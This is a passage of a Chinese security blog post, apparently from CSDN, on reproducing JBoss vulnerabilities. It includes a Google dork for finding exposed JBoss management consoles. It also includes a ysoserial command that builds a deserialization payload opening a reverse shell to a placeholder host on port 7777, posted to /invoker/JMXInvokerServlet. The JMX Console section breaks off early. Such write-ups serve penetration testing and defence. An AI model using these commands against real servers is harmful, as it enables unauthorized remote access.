JBoss系列漏洞复现以及实战心得

本文详细介绍了JBoss应用服务器的多个安全漏洞,包括JMXInvokerServlet反序列化漏洞、JMX Console未授权访问Getshell、JBossMQ JMS反序列化漏洞(CVE-2017-7504)、5.x/6.x反序列化漏洞(CVE-2017-12149)和admin-Console后台部署war包Getshell。通过漏洞复现和实战心得,讨论了环境差异、权限问题和war包部署等问题,强调了在安全测试中灵活应对不同情况的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

谷歌语法:inurl:/console/ intitle:"JBoss Management"

 

一、JBoss JMXInvokerServlet 反序列化漏洞

漏洞描述

JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。返回如下,说明接口开放,此接口存在反序列化漏洞:

漏洞版本

Jboss4.x/5.或者以下

漏洞复现:

漏洞利用结果类似CVE-2017-12149,利用ysoserial来生成ser包

java -jar ysoserial.jar CommonsCollections5 "-i >& /dev/tcp/xxxxxxx/7777 0>&1" > poc.ser

burpsuite抓包后post提交ser包即可反弹shell

 

二、JMX Console未授权访问Getshell

漏洞描述
此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。

影响版本
Jboss4.x或者以下

漏洞复现

访问漏洞页面,

点击JMX Console后,进入到如下页面:

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值